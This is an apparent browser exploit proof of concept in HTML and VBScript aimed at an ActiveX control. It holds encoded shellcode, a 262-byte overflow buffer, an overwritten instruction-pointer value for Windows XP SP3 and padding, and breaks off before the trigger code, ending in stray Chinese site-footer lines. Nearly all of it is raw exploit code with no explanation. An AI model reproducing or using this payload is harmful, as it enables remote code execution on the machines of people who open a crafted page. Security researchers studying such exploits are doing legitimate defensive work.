Exploit:
<html>
<object classid='clsid:723AA6D1-3B50-11D1-9636-00600818410C' id='target'></object>
<script language='vbscript'>
shellcode = unescape("%u7a44%u3732%u7a44%u3732%u03eb%ueb59%ue805%ufff8%uffff") & _
unescape("%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458") & _
unescape("%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244") & _
unescape("%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144") & _
unescape("%u5856%u5a34%u4238%u4a44%u4d4f%u4f4e%u4e4a%u3446%u5042") & _
unescape("%u5042%u5042%u384b%u3445%u534e%u584b%u374e%u3045%u574a") & _
unescape("%u3041%u4e4f%u384b%u344f%u314a%u584b%u454f%u3242%u3041") & _
unescape("%u4e4b%u3449%u584b%u3346%u484b%u3041%u4e50%u5341%u4c42") & _
unescape("%u4949%u4a4e%u4846%u4c42%u5746%u3047%u4c41%u4c4c%u304d") & _
unescape("%u3041%u4c44%u4e4b%u4f46%u434b%u5546%u3246%u3046%u5745") & _
unescape("%u4e45%u584b%u454f%u3246%u5041%u4e4b%u3648%u584b%u304e") & _
unescape("%u544b%u584b%u554f%u514e%u5041%u4e4b%u484b%u414e%u484b") & _
unescape("%u3041%u4e4b%u5849%u454e%u5246%u5046%u4c43%u5341%u4c42") & _
unescape("%u4646%u384b%u3442%u5342%u4845%u4c42%u574a%u304e%u484b") & _
unescape("%u3442%u504e%u384b%u5742%u314e%u4a4d%u584b%u364a%u304a") & _
unescape("%u4e4b%u5049%u484b%u5842%u4b42%u3042%u3042%u3042%u384b") & _
unescape("%u464a%u334e%u454f%u5341%u4f48%u4642%u5548%u3849%u4f4a") & _
unescape("%u4843%u4c42%u474b%u3542%u564a%u5750%u4d4a%u4e44%u3743") & _
unescape("%u364a%u494a%u4f50%u384c%u5050%u4547%u4f4f%u4e47%u5643") & _
unescape("%u4641%u364e%u5643%u5042%u5a5a")
buffer1 = string(262, "A")
ecx = unescape("%u0090%u0090")
eip = unescape("%u048b%u0041") ' eip = unescape("%u048b%u0041") <--- (sp3 en) # eip = unescape("%u048b%u0041") <--- (sp3 fr)
fill = string(4, "A")
nop = string(600, "A")
京公网安备 11010502034610号
暂无评论